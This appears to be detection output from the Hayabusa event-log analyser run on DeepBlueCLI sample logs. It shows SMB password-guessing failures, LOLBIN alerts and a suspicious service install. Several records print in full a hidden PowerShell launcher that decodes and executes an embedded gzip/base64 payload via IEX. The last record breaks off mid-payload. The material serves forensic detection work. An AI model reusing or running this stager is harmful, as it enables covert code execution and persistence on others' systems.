+2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyJ82cfaddnc8c6D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KJRw0S82SupmuS4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4lSo9BMWdcPLfLb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XreSLg472qhJw0R3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIJcQJKLmnjrE2T9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlddo3GCTEIkFyi9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hxiZoB5mHR2tGUFM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fpEbpiox2Q3Qf8av | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:54:20.959 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x438 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 01:55:28.022 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x338 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 01:55:39.187 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x658 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 02:43:48.712 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\8xpeyiyp.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf4 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 02:43:48.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ud-vxj7k.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x840 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 02:43:49.017 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gsxogihi.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x2f8 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 02:43:49.106 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\owummvtl.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xe48 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 02:43:49.183 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 02:43:49.891 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xfb0 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 02:43:49.912 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x184 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:36:09.237 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:36:09.334 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//